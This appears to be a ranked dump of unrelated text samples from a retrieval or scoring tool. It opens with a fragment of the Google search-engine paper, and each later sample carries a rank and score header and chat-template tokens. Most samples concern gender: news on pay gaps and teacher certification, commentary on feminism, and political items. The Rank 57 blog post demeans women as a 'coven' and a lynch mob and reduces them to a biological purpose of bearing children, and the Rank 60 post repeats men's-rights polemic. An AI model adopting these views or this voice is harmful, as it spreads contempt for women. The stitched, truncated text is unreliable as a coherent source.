Retrieval, PageRank, Google + +1. Introduction + +1.1 Web Search Engines -- Scaling Up: 1994 - 2000 + +1.2. Google: Scaling with the Web + +These tasks are becoming increasingly difficult as the Web grows. However, hardware performance and cost have improved dramatically to partially offset the difficulty. There are, however, several notable exceptions to this progress such as disk seek time and operating system robustness. In designing Google, we have considered both the rate of growth of the Web and technological changes. Google is designed to scale well to extremely large data sets. It makes efficient use of storage space to store the index. Its data structures are optimized for fast and efficient access (see section 4.2). Further, we expect that the cost to index and store text or HTML will eventually decline relative to the amount that will be available +================================================================================ +Rank = 57; Score = 288768.0 +<|begin_of_text|>Looking back, we had, in the person of Teddy Roosevelt, the finest President in the history of this country. He had the spirit and determination that matched the times and the land. Then the women got the vote, and everything went to hell. While our boys was overseas fighting the Kaiser, the women got Prohibition put in. Drinking and gambling and whoring were declared unlawful. All those things which come natural to men became crimes. –The Life and Times of Judge Roy Bean + +One of the more obvious aspects of the modern lynch mob is it is almost always composed of women. Sure, there will be men tagging along, maybe throwing in some shots of their own, but the organizers are always women. Maybe a homosexual male will start it with a point and shriek, but 99 times out of 100, the person organizing the lynch mob is going to be a woman. She will sound the alarm and the rest of the coven will arrive, ready to set fire to the wicker man. + +The social justice warrior phenomenon is mostly a product of Facebook and Twitter, as these services made it easier for stupid people to get on-line and blast their idiocy worldwide. As a result, unhinged young women now have easy access to a megaphone. Whenever one of them gets the boo-hoos or feels slighted by a man, she can give a couple of blasts on the horn and before long we have #gamergate or some other nonsense controversy. + +That’s the most striking feature of the social justice warrior phenomenon. It is young, unattached females. Put #gamegate into a google machine and the third hit is a blog run by a lonely, unstable female. In fact, feminism today is just that, lonely unattached females looking for a purpose to their lives. Instead of snagging a husband and having kids, they kit themselves out like extras from the freak show and scream at men for not loving them. Instead of tending to children, they talk endlessly about their unused female parts. + +Much of what is going wrong in the West is some version of what we are seeing with the endless hashtag campaigns run by women. The female of our species has a biological purpose. That’s to find a suitable mate, bear children and raise them to sexual maturity. That’s nature’s assignment to women. Anything else is either in support of that purpose, frivolous or in opposition to biological necessity. + +The result of a century of feminism is a society that works against the interests of women. Young men +================================================================================ +Rank = 58; Score = 288768.0 +<|begin_of_text|>Teacher positions in Hawaii’s public schools are filled by fewer certified teachers this year than last, according to numbers released Tuesday by the Hawaii Department of Education. + +The latest figures show that while the number of instructors who’ve fulfilled a state-approved teacher education program is slightly up this year, the percentage of certified teachers in relation to total teaching positions statewide fell slightly to 92 percent from 93 percent the year before. + +Out of the total 13,320 teaching positions as of October, 12,309 positions by the start of this school year were filled by certified teachers. That means 1,011 positions in Hawaii schools statewide are being filled by emergency hires or long-term substitutes. + +Last school year, 12,268 certified teachers filled a total 13,188 positions, meaning there were 920 positions occupied by emergency hires or long-term subs. + +The latest figures reflect a bit of a setback for Hawaii education officials, who have long been contending with a teacher shortage in the state in addition to weak retention levels as measured at the five-year mark. + +Cory Lum/Civil Beat + +Hawaii’s Department of Education wants to fill 96 percent of its teacher positions with certified teachers by 2020 as part of its long-range strategic plan. The number of certified teachers in place by the start of each school year is one of 14 indicators of student success outlined in that plan. + +The figures were presented to the Hawaii Board of Education by DOE administrators, relying on a new data tool that further breaks out these figures by the 15 complex areas statewide. + +The percentage of certified teachers ranges widely across the state — only 84 percent of teachers in the Nanakuli-Waianae complex are certified, for instance, compared with 96 percent in Hilo-Waiakea on Big Island. + +Certified teachers in Hawaii must have at least a bachelor’s degree and have completed a state-approved teacher training program plus other requirements. + +Education officials also released the number of qualified instructors in special education classrooms. Out of the 2,151 special ed teaching positions this year, 1,840 are filled by certified instructors, meaning 311 spots, or 14 percent of the total positions, are occupied by those not trained in this area. + +That percentage is about level with last year’s numbers, but disparities across each complex area are much starker. In Nanakuli-Waianae, for instance, only 73 percent of special education teachers in that region are certified. + +When it comes to teacher retention at the five-year mark, 54 percent +================================================================================ +Rank = 59; Score = 286720.0 +<|begin_of_text|>By the time a person turns 80, her life has consisted of 29,200 days. In the case of Gabriele Köpp, that life has included a high-school education and a training program as a physical and technical assistant. It has also included an affinity for "pure mathematics," as Köpp calls it, and for physics. + +She is fascinated with the power of the tiniest particles, or, quoting Goethe, with "what holds the world together in its innermost self." Because of her fascination for elementary particles, she went on to earn a doctorate in physics and eventually became a university professor. + +Her life has also included many friendships, primarily with men, from doctoral students to colleagues to Nobel laureates. And there are also eight godchildren in her life. + +Nevertheless, for Gabriele Köpp, what happened in the space of only 14 days was enough to cast a dark shadow over the rest of her life, the remainder of those 29,200 days. + +No Home to Return To + +Köpp is sitting in an armchair in her Berlin apartment, talking about those 14 days. She serves freshly brewed coffee with condensed milk out of a can. She smokes the long, thin Kim brand of cigarettes, which have become rare in Germany. + +There are black-and-white photographs of her mother, her father and her sisters hanging on the walls. They are all dead. There are also photos of her parents' house, including exterior and interior views. The house was in Schneidemühl, a town in the former German region of Pomerania; today the town is called Pila and is located in northwestern Poland. Where the house stood is nothing but a meadow today. + +Köpp describes the photos with German words from a distant era: the Salon with its chandelier, her father's Herrenzimmer ("study"). Her pronunciation also betrays her roots. She says "Tack" instead of "Tag" (the informal version of "Guten Tag," or "hello"), just like many others who originally come from regions that were once German and are now Polish. + +Köpp's apartment is not one of those long-occupied flats that contain layer upon layer of the possessions its occupant has accumulated over the years. She only took the apartment about 10 years ago, when she retired from her position at the Technical University of Aachen in western Germany and moved to Berlin. When asked whether she thinks it's unusual for someone to move at that age +================================================================================ +Rank = 60; Score = 286720.0 +<|begin_of_text|>If you want any proof that feminists hate men, just look at how they react in disgust towards the phrase “Men’s Rights Activists”. Many of them deny men face discrimination and that men have all the power in society and use it to oppress women. + +So what is a Men’s Rights Activist? Well if you ask a feminist, it is anyone who is against feminism. They literally use this term to describe any anti-feminist- The Amazing Atheist, Thunderf00t, Sargon of Akkad, Milo Your banana is a police, Pick Up Artists, GamerGaters; really anyone disagrees with them. You see the headlines, such as Men’s Rights Activists boycott Star Wars and Men’s Rights Activists joined the Alt-Right. + +Most people who get called MRAs are not actually MRAs- they don’t identify as such, and don’t advocate for men’s issues, or at least it’s not a primary focus of theirs. But there are self-described Men’s Rights Activists. I consider myself one for instance, and we generally believe in Men’s Equality- with Anti-Feminism as just a side focus. So how did all these other guys get lumped in? + +It all really started in 2012, when the SPLC but a bunch of Websites on a watchlist. Most of them were not Men’s Rights sites, but a few were lumped in such as A Voice for Men. Despite these sites being vastly different from each other in what they stand for, the Leftist SPLC placed them together to smear them. + +On March 2014, when the Isla Vista Shootings occurred. The perpetrator, Elliot Rogers, was a failed pick-up-artists who wanted revenge on women for not dating him, as well as the men who did get into relationships. Elliot had zero connection to the Men’s Rights Movement and wasn’t even involved in much anti-feminism. However shortly after this event, media outlets described him as a Men’s Rights Activist. My pal, Bane666au covers this greatly in his video series “The Propoganda of Toxic Feminism” named after feminists described “Toxic Masculinity” as the reason why Elliot went on his rampage. + +But the short story is that it was originally covered by a DailyKos article written by Ollie Garkie which claims Elliot Rogers was influenced by the Men’s Rights Movement. Hundreds of media outlets and thousands of feminists took this as truth and used it as an opportunity to smear Men’s +================================================================================ +Rank = 61; Score = 284672.0 +<|begin_of_text|>There is this thing that people (mostly men) love to do on Twitter, something other than harass women and send DMs of their half chubs. It’s called threading, and it’s one of the many things ruining my Twitter experience. + +Threading happens when someone has a lot of thoughts or feelings on a particular topic, so many that they can’t fit them all into 140 characters. So, ostensibly to help readers follow along on their train of thought, they thread the tweets together by replying to themselves. Sometimes they even use numbers! + +Advertisement + +Yesterday, a man named Eric Garland, a “strategic analyst for businesses and government agencies” with around 30K followers, decided it was time for some “game theory” without consultation from the rest of the internet (it wasn’t time and will never be time). The ensuing political rant is so insane and prolific it took up almost 6 pages when posted into a Google doc, and included a map. I dare you to read his thread in full and try to still respect yourself. + +The content of Garland’s self-proclaimed “” isn’t really important, as most aren’t. They are typically “intellectual” dribblings from men who love Explaining Things To Me (essentially a subtype of Online Mansplaining). These are people who want their ideas to take up the absolute most space possible. Like Manspreading, but of digital space. + +Enter: Manthreading. + +Manthreading is when Jeet Heer, a senior editor at The New Republic, thinks people fucking vegetables warrants 21 points: + +Advertisement + +Manthreading is when Josh Marshall, editor and publisher of Talking Points Memo, decides to fight back against the alt-right’s Nazi Pepe by suggesting that Kermit be a political icon for good and using the hashtag #ImWithKer. (It’s so embarrassing, and was worse when he had a kermit avi): + +Or how about Venture Capitalist Marc Andreessen deciding that four threads on Stagnation Theory were not enough, and adding a fifth, the Stagnation Theory Wrap-up (5/5): + +Advertisement + +The best thing about Manthreading is how unnecessary it is. There are other tools—blogs—you can use if your have more than a few tweets worth of content to spew onto the internet. Twitter co-found Ev Williams fucking built Medium for this exact reason. Twitter...but longer. Wyd, Manthreaders? + +The thing about Manthreaders, though, is that they want their +================================================================================ +Rank = 62; Score = 284672.0 +<|begin_of_text|>Image caption Despite having the same qualifications as men, recent women graduates earn less, suggests a study + +Female graduates earn thousands of pounds less than their male counterparts, according to a report. + +The pay gap persists even between men and women from the same types of university who studied the same subjects, suggests the study. + +Researchers for the Higher Education Careers Services Unit (Hecsu) analysed how much students who applied to higher education in 2006, earned last year. + +Jane Artess, of Hecsu, said pay distribution was "strikingly uneven". + +This was despite laws designed to ensure equal access to jobs and pay, said Ms Artess, + +The researchers analysed data from a longitudinal study of 17,000 recent graduates called Futuretrack. They found that the take-home pay of more than half of female graduates ranged between £15,000 and £23,999. + +Male lead + +Men were more likely to take home £24,000 and above, they found. + +The analysis did not include part-time workers or the unemployed. + +The data, published in the Hecsu journal Graduate Market Trends, suggested men earned more than women across all degree subject areas, even if more women took those subjects than men. + +"When graduate earnings are examined by subject, it is clear that women earned less than men who studied the same subject," says the article. + +The authors add this is the case across all subject areas, "even where women's participation is greater than men's". + +"Equal opportunity to access jobs and pay has been enshrined in legislation for 40 years, yet Futuretrack found that being female can make a difference to a graduate's earning power", said Ms Artess. + +"It is difficult to see why this is, for example, female graduates of media-related subjects are no more or less numerous than their male counterparts yet their earnings are typically lower. + +"Of the Futuretrack respondents, there were fewer men than women in law, yet there is an even greater male lead on earnings. + +"Since it would be unlawful for employers to pay males and females doing the same job differently, something else must be happening to female graduate earnings. + +"If we look at wages by sector, the male lead is persistent in the public and private sectors, in graduate workplaces and also in graduate and non-graduate job roles. + +"The only area where female pay is equal to males is in the not-for-profit sector," said Ms Artess. + +Trades Union Congress (TUC) general secretary Frances O'Grady described the findings as "very alarming." + +Motherhood +================================================================================ +Rank = 63; Score = 284672.0 +<|begin_of_text|>Cinema has long struggled with representing women as actual complex human beings. Writer Kelly Sue DeConnick once noted that a disturbing number of female characters in modern stories (including movies) fail to pass The Sexy Lamp test. This means the majority of female characters in Hollywood can pretty much be replaced with a “sexy lamp”, as they don’t accomplish anything and only serve the purpose of being a good-looking prop for men to fight over. + +source + +CAPTION: Pictured: Hollywood’s idea of an empowered, independent woman. + +What you might not know is that some of these women were far less lamp-like in the original stories that their movies were based on. A lot of times, a TV or movie adaptation of a story will go out of it’s way to make the leading lady more passive and give her accomplishments to a male character + +There can be multiple reasons for this and generally all of them are dumb. It could be that the producers wanted to take away the lady’s screentime to give the male lead more time to flex his bulging biceps; it could be they felt they absolutely had to have a helpless woman to tug at the audience’s tender heartstrings or in some cases, they simply could not even fathom the idea of a woman actually accomplishing anything. + +These seven examples explore all the weird and dumb ways women can go from an active characters in the original to alluring light fixtures in the film version. + +Violet Baudelaire in A Series of Unfortunate Events + +source + +Caption: Just an innocent tale about a creepy old guy relentlessly pursuing three children. + +Lemony Snicket’s bizarre children’s books, A Series of Unfortunate Events, followed the macabre adventures of three orphan siblings as they were tormented by the evil Count Olaf. The orphan siblings in question were Violet, who was basically MacGyver with a bow; Klaus, the character who tricks kids into buying up the series when they see him on the cover and think he’s Harry Potter, and Sunny, a baby with freaking shark teeth who will haunt your nightmares. + +The books were pretty popular, proving what everyone already knew: kids are sadists who love to consume stories about suffering. So in 2004, a movie based off the first three books was made. + +source + +Caption: AKA “Jim Carrey’s Twitchy Eyebrows the Movie” + +The climax of the movie was based off the climax of The Bad Beginning, the first book. In a scheme to gain the inheritance that will go to Violet when +================================================================================ +Rank = 64; Score = 282624.0 +<|begin_of_text|>Whatever else is said about the murder of 20 elementary school children in Newtown, Conn. last year, let no one say – especially at the Senate Judiciary Committee hearings on gun control today – that those killings were “unimaginable.” Every day, mass killings are imagined, rehearsed, and enacted – virtually – by millions of children and young adults, mostly boys and men, in violent video games. One segment of Bioshock 2, for example, invites players to kill defenseless, cowering girls (called Little Sisters) or lure them into a trap where they are mowed down by a machine gun. + +Adam Lanza didn’t have to imagine the Sandy Hook massacre on his own. Others had already imagined it for him. + +When Wayne LaPierre, head of the National Rifle Association, pointed a finger at video games and media violence during a news conference after the shootings, it was a calculated effort to distract attention from the gun industry and its powerful lobby. As former Congresswoman Gabrielle Giffords and her husband Mark Kelly wrote in their USA Today op-ed announcing the launch of their gun-control superPAC, "We saw from the NRA leadership's defiant and unsympathetic response to the Newtown, Conn., massacre that winning even the most common-sense reforms will require a fight." + +But Mr. LaPierre was also half right. Glock and Bushmaster give troubled teens and young adults like Lanza the means to kill. But antisocial video games and a wider culture of militarism give them the script. + +What LaPierre neglected to say is that the arms industry, the video game industry, and the military are deeply entwined with one another and even, one could argue, allied in values. In many ways, their work together is eroding the distinction between virtual and real killing. + +During the Iraq War, Marines relaxed after conducting search and destroy missions by playing Call of Duty 4 and CounterStrike, fielding the same weapons and tactics. CIA agents and Air Force personnel today kill real people in distant countries using remotely piloted drones, on interfaces modeled on video games, while US soldiers hone tactical combat skills on video game simulators and use Xbox joysticks to control real machines in the battlefield. + +Meanwhile, the video game industry works closely with the military and gun manufacturers to ensure that their virtual weaponry, from the PM-63 submachine gun to the C-130 gunship, behaves just like the real thing. Some game companies have direct contracts with the Department of Defense, manufacturing hardware +================================================================================ +Rank = 65; Score = 282624.0 +<|begin_of_text|>There seems to be a widespread misconception in the Orthodox world that the upcoming holiday of Simchat Torah is a “men’s holiday.” + +I can understand the confusion, stemming from what we celebrate and how we celebrate it. Simchat Torah has evolved as a celebration of the annual cycle of weekly Torah readings—readings which, in Orthodox shuls, occur purely on the men’s side of the mechitza (divider). And we celebrate it by taking all the Torah scrolls out of the ark—also on the men’s side—and dancing seven circuits, or hakafos, with them. There is much joyful singing, generally in a masculine timbre, and the dancing men take turns holding the heavy scrolls. + +READ: This is the Torah + +With so much action naturally taking place on the other side, I can understand—sort of—why things tend to be much less lively on my side of the mechitza. Depending on the community, the women might dance, but it is rarely as exuberant, as populated, or as sustained as the men’s dancing. My childhood memories of the holiday involve a core group of women who enjoyed dancing and would try to get things going, while most of the women might join for a few minutes in between their primary activities of chatting, chasing sugared-up children (did I mention excessive candy often plays a role in the celebrations?), and watching the men. From what I have experienced and heard since, my shul was fairly typical, though in many places the women don’t dance at all—or even show up. + +My husband likes to tell of the girl he once dated who was surprised at the suggestion that she might go to shul on Simchat Torah. “Why would I go?” she asked. “I have no one to watch!” For her, I think, it was accepted as a matter of course that dancing on Simchat Torah is what men do, and she wouldn’t have ever imagined that she could—or should—have a part in it. + +For others, the questions around women and Simchat Torah are more fraught—and many focus on the Torah scrolls themselves, arguing that if the women can’t dance with a Torah, then they feel excluded, like their dancing is pointless. Indeed, in more recent years, as this sort of discomfort with gender disparities has increased, many rabbis have concluded that there is no real halachic problem with a woman carrying a Torah scroll, and in some shuls a scroll or two will be passed to the women’s side for the dancing +================================================================================ +Rank = 66; Score = 278528.0 +<|begin_of_text|>Distraught that women are outpacing men in college enrollments, Eagle Forum founder Phyllis Schlafly took to WorldNetDaily this week to float the idea that colleges should enforce a gender quota to even out admissions to the benefit of men. Responding to a 2010 New York Times article, Schlafly wondered if colleges should set male admissions quotas to ensure that student bodies are “half women and half men.” + +Another proposal Schlafly put in the mix is to “stop granting college loans, thereby forcing students to take jobs to pay for their tuition and eliminate time for parties, perhaps even wiping out time for fraternities and sororities.” + +Schlafly also called for colleges to stop enforcing Title IX, which prevents sex discrimination in education, as a way to attract men, alleging that the anti-discrimination measure “removes a primary motivation for young men to go to college, many of whom want to try out for a sport even if they are not good enough to make the team.” + +All of this, the right-wing activist insists, would actually benefit women because it would give them more available men to date.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 67; Score = 276480.0 +<|begin_of_text|>ESPN Events has announced that Atlanta, Georgia-based BitPay will serve as the new title sponsor of the annual St. Petersburg Bowl — an NCAA-sanctioned post-season college football game that has been taking place since 2008. + +BitPay, renowned for its business of allowing merchants to easily accept bitcoin payments and convert them instantly to local currency, will have the game known as the Bitcoin St. Petersburg Bowl beginning with this year’s game, slated to be held on the 26th of December at Tropicana Field in St. Petersburg, Florida. + +“Our goal is to continue to move bitcoin into the mainstream and sponsoring the St. Petersburg Bowl offers us that opportunity,” noted Mr. Tony Gallippi, Executive Chairman at BitPay. “College football fans and the bitcoin community represent a similar target demographic – tech-savvy men between the ages of 18 and 40.” + +BitPay has secured the game title sponsor opportunity for three years until the December game in 2016. + +Aired nationally on ESPN — a major sports network — the St. Petersburg Bowl game is watched by many sports fans (particularly those interested in football, quite obviously), and BitPay’s hoping to use the opportunity to “further promote interest in the digital currency on a national scale.” + +“We’re extremely excited to welcome BitPay to college football and our bowl home in St. Petersburg,” says Brett Dulaney, who heads the St. Petersburg Bowl. “We look forward to a long and mutually beneficial arrangement.” + +Previous sponsors of the St. Petersburg bowl include magicJack (voice over IP service) and Beef ‘O’ Brady’s, a sports bar/restaurant franchise. + +Tickets to the game will be available via traditional channels (such as TicketMaster), but also by paying with bitcoin (this includes merchandise, too). + +Bitcoin in sports + +This isn’t bitcoin’s first encounter with sports. + +Earlier this year, NBA team Sacramento Kings announced they would be accepting bitcoin for game tickets and merchandise. And most recently, the San Jose Earthquakes (Major League Soccer) announced they too would be accepting bitcoin — even in-stadium at concession kiosks and in their gift store. + +The St. Petersburg Bowl game kicks off at 8 p.m. local time on December 26th. For more information, visit bitcoinstpetebowl.com.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 68; Score = 276480.0 +<|begin_of_text|>OUCH! James Woods Takes Blowtorch To #NeverTrumper Jeff Flake For Criticizing Trump Rallies + +Senator Jeff Flake (R-AZ) criticized attendees of President Trump’s political rallies Sunday, claiming they represent ‘spasms of a dying party.’ + +“When you look at some of the audiences cheering for Republicans, sometimes, you look out there and you say, ‘those are the spasms of a dying party,’ ” Flake told ABC’s “This Week.” + +“When you look at the lack of diversity, sometimes, and it depends on where you are, obviously, but by and large, we’re appealing to older white men and there are just a limited number of them, and anger and resentment are not a governing philosophy,” Flake added. + +Hollywood star and conservative firebrand James Woods blasted the outgoing lawmaker over his comments. + +“You mean the party that has the Presidency, the House, the Senate, the Supreme Court, the majority of State Legislatures, the majority of State Governors, and is poised the steamroll over the broke Democrats in 2018, 2020, and 2024? You mean THAT dying party? #NumbskullJeffFlake?” + +You mean the party that has the Presidency, the House, the Senate, the Supreme Court, the majority of State Legislatures, the majority of State Governors, and is poised the steamroll over the broke Democrats in 2018, 2020, and 2024? You mean THAT dying party? #NumbskullJeffFlake? https://t.co/TULfAGEvMz — James Woods (@RealJamesWoods) December 25, 2017 + +Ouch. + +Flake made headlines recently after cutting a check for Democrat Senate-elect Doug Jones. After making the political contribution, Flake taunted conservatives by tweeting “country over party”. + +The Hill reports: + +Flake, who has announced he will not seek reelection in 2018, has been a frequent critic of Trump, earning the president’s ire on Twitter. The Arizona senator refused to back Republican Alabama Senate candidate Roy Moore, calling him unfit for office. He wrote a $100 check to Democrat Doug Jones in the race, writing “Country over Party” in the memo line. + +Country over Party pic.twitter.com/JZMTaEYdxQ — Jeff Flake (@JeffFlake) December 5, 2017<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 69; Score = 276480.0 +<|begin_of_text|>Sport, we’re told, lies at the heart of what it means to be Australian. But what in reality does this mean? The Conversation, in partnership with Griffith Review, is publishing a series of essays exploring the role and place of sport in Australian life. + +Tasmania’s northwest coast city of Burnie has long suffered high unemployment. In 2015, however, residents were shocked to find that unemployment among young people in Burnie had topped the nation: 21% of young men aged between 15 and 25 were neither employed nor studying. Just under half of all young people did not finish high school. And between 2011 and 2015, the number of Newstart recipients had grown by 40%. + +Hard hit by the shrinking manufacturing sector, youth unemployment in the region was forecast to swell even further in the years ahead, to 33%. For young Burnie residents, the future looked bleak indeed. + +Alarmed by these findings, the leadership of Australian rules football in Tasmania surveyed Burnie AFL players. They wanted to know how many of its players were unemployed and not studying. + +They feared the worst. With Burnie football players in the bullseye of the most at-risk demographic – men under the age of 30, some from the lowest socioeconomic ranks – football officials were worried about their own. + +What they found surprised even them. Club officials reported that not one of their players was unemployed. All were either employed or in full-time education. The employment (or studying) rate for AFL players in a city with the nation’s highest unemployment rate was 100%. + +Asked to explain this remarkable disparity between young footballers and the rest of the community, club officials pointed to two simple factors. + +First, young men who play football gain vital skills that make them employable. They show up on time, every time; they’ve learned how to work in teams; they understand that hard work and self-discipline lead to improvement; they are confident; they can cope with pressure; and they are fit and healthy – they don’t allow alcohol, junk food or drugs to overtake their lives. + +Second, they are part of a social network that supports them. When faced with a risk of losing their job, someone from the club would connect these young people to someone else looking for reliable and capable young employees. Club members could recommend the young player for employment and, because of the footballers’ basic skills, be confident in doing so. The club officials don’t get paid to help; they just do it, because they +================================================================================ +Rank = 70; Score = 274432.0 +<|begin_of_text|>Depending on who you ask, Occupy Wall Street is either the inevitable outpouring populist outrage resulting from decades of corporate greed and abuse or a goalless collection of spoiled unemployed hippie sex fiends who just want to complain about something. Regardless of what you think about the protesters, the cause has grown from one mid-September march to a bona fide movement in dozens of cities. With voices from the far right claiming that the people protesting abuse of power by white men are mostly other white men, how are women in the movement making sure their voices aren't drowned out? + +The Occupy Wall Street movement seems, to the outsider, to be about almost every possible progressive pet issue, but at its core, it's about taking up physical space. Much of the actions of government and business now occur within the virtual realm— numbers flashing across a screen, computer-based algorithms performing transactions that pass billions of dollars from one organization to another in microseconds, human-designed formulas denying actual humans medical coverage based on medical history and risk factors. The 99% of people who are currently getting hosed by the country's wealthiest 1% can't reclaim the virtual space that was never theirs, but they can assert themselves in the physical space that's rapidly being taken from them, sort of like how female participants in this year's SlutWalk movement publicly reclaim their bodies. + +The movement's white male bent has prompted some female activists to opt not to participate in Occupy Wall Street at all. Over at In These Times, Sady Doyle isn't so sure that OWS cares about women, noting that the same men who had poked fun at her activism before OWS were now imploring her to join them in protest. She resents the movement's ostentatious goals and overestimation of its importance. Further, they didn't support her and other women involved in Slutwalk, so why would she support them? She writes, + +The men I knew who had been Occupying Wall Street were still not there with me at the year's most heavily promoted anti-rape protest. I still couldn't rationally expect them to be. The "next global feminist movement" still wasn't moving strongly enough to occupy the city for three weeks. Or even one whole day. + +Other activists are choosing the participate in the movement as reluctant educators. Racialicious contributors Hena Ashraf and Manissa McCleve Maharawal dropped in on Occupy Wall Street in late September. The two were initially pleasantly surprised by the crowd's diversity and kindness. They just so happened to be +================================================================================ +Rank = 71; Score = 274432.0 +<|begin_of_text|>Senate Republicans’ plan to repeal and replace Obamacare, called the Better Care Reconciliation Act, would make it harder for Americans to access health care, and specifically make it harder for women to access crucial health benefits — from birth control to maternity coverage. This may come as no surprise, given that the bill was written by 13 men. + +The Affordable Care Act made several changes to improve women’s access to health care in the US. The law expanded contraceptive access, required (at long last) private small-group insurers to cover maternity care, and broadened the number of people who could access Medicaid — which pays for half of all births in this country. + +These advances mattered to public health when you think about how poorly American women fare compared with women in other rich countries when it comes to several health outcomes. (We have some of the worst maternal health and mortality outcomes in the developed world, and life expectancy for women is going down.) They also gave women some relief from worrying about the cost of accessing very basic health services. + +Doctors and reproductive health advocates are saying the GOP’s Senate health care bill looks like a big step backward. On Thursday, the bill was released to the public after a secretive deliberation process, and the Senate is expected to cast a vote on it next week. Here are the four key ways this bill could undermine the health of American women. + +1) The bill overhauls and dramatically cuts Medicaid — which covers half of all US births + +Medicaid is incredibly important for reproductive health: The program for low-income Americans pays for half of all births, including two-thirds of unplanned births. Three-quarters of the public dollars spent on family planning are Medicaid dollars, and in 17 states, Medicaid programs also cover abortion with state dollars. + +The core idea behind the Better Care Act is cutting spending on health care for the poor to finance tax cuts for the rich, as Vox’s Andrew Prokop explained. In practice, this means phasing out Medicaid expansion (which made more people eligible for the program) by 2021. + +But that’s only the beginning. “Once the Medicaid expansion is repealed, Republicans get to work on 